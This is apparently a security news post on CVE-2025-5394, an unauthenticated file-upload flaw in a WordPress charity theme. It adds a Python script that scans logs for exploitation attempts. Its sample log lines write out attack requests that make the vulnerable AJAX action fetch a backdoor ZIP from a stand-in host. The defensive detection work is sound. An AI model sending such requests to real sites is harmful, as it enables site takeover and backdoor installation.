Hackers Exploit Critical Vulnerability in WordPress Theme

Hackers are exploiting a critical vulnerability in the "Alone – Charity Multipurpose Non-profit WordPress Theme," tracked as CVE-2025-5394 and rated 9.8 (critical) on the CVSS scale. Discovered by security researcher Thái An, the flaw is a missing capability check in the theme's "alone_import_pack_install_plugin()" function, which lets unauthenticated attackers upload arbitrary files to the site. All theme versions up to and including 7.8.3 are affected; the fix shipped in version 7.8.5, released on June 16, 2025.
Wordfence's István Márton explains that the arbitrary file upload enables remote code execution and therefore full takeover of the affected site. Exploitation began on July 12, before the vulnerability was publicly disclosed, which suggests the attackers were monitoring code changes to the theme (such as the fix itself) to find new vulnerabilities. Wordfence reports having blocked 120,900 exploitation attempts, most of them from a small set of source IP addresses it has published.
The attacks typically point the vulnerable function at an attacker-controlled ZIP archive containing a PHP backdoor; once installed, the backdoor gives the attacker command execution and further file upload on the server. Attackers also install file-manager plugins and additional backdoors and use them to create rogue administrator accounts. To reduce risk, site owners should update the theme to version 7.8.5 or later, review the user list for administrator accounts they did not create, and check web server and WordPress logs for requests invoking "alone_import_pack_install_plugin" (the function is exposed as an AJAX action, so such requests target admin-ajax.php).
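As an added illustration of the log check recommended above (this is example code, not something from the article, Wordfence, or the theme), the script below scans web server access log lines in combined log format for calls to admin-ajax.php whose action parameter is the vulnerable AJAX action, extracts the remote ZIP URL where it appears, and tallies attempts per source IP. The log lines are constructed for the example and use documentation IP ranges; the assumption that the ZIP URL travels in a parameter named "plugin" and that the action name appears in the query string is an assumption about the request shape, not a fact stated on this page.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" log format:
# ip - - [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# AJAX action named in the advisory for CVE-2025-5394.
VULN_ACTION = "alone_import_pack_install_plugin"

# Constructed sample log lines (documentation IP ranges, invalid hostnames).
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Jul/2025:03:14:07 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=alone_import_pack_install_plugin&plugin=https%3A%2F%2Fexample.invalid%2Fbackdoor.zip'
    ' HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jul/2025:03:15:22 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Jul/2025:03:16:40 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=alone_import_pack_install_plugin&plugin=https%3A%2F%2Fexample.invalid%2Ffilemanager.zip'
    ' HTTP/1.1" 200 57 "-" "curl/8.4.0"',
    '198.51.100.7 - - [12/Jul/2025:03:18:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.55 - - [13/Jul/2025:11:02:13 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=alone_import_pack_install_plugin HTTP/1.1" 403 12 "-" "python-requests/2.32"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    u = urlparse(rec["target"])
    rec["path"] = u.path
    # Keep the first value of each query parameter (parse_qs already URL-decodes).
    rec["params"] = {k: v[0] for k, v in parse_qs(u.query).items()}
    return rec


def is_exploit_attempt(rec):
    """True when the request targets admin-ajax.php with the vulnerable action."""
    return (
        rec is not None
        and rec["path"].endswith("/wp-admin/admin-ajax.php")
        and rec["params"].get("action") == VULN_ACTION
    )


def scan(lines):
    """Return one record per exploitation attempt found in the given log lines.

    Caveat: a standard access log records only the query string, not the POST
    body. An attacker who sends the action in the body leaves no trace here, so
    treat this as a lower bound and also consult WAF or PHP-level logs.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if is_exploit_attempt(rec):
            hits.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": rec["status"],
                # Assumed parameter name carrying the remote ZIP URL.
                "zip_url": rec["params"].get("plugin"),
            })
    return hits


def attempts_per_ip(hits):
    """Count attempts by source IP, useful for blocking and for IOC reporting."""
    return Counter(h["ip"] for h in hits)


def zip_urls(hits):
    """Distinct payload URLs seen, for follow-up retrieval and analysis."""
    return sorted({h["zip_url"] for h in hits if h["zip_url"]})


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h)
    print("attempts per IP:", dict(attempts_per_ip(found)))
    print("payload URLs:", zip_urls(found))
```

Run it against a real log with something like `scan(open("/var/log/apache2/access.log"))`; a hit with a 200 status is not proof of success (WordPress AJAX handlers return 200 for many error paths), so follow any hit by checking wp-content/plugins and wp-content/uploads for recently added ZIP or PHP files and the users table for unexpected administrators.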
Stay secure — stay Wavasec. 🔐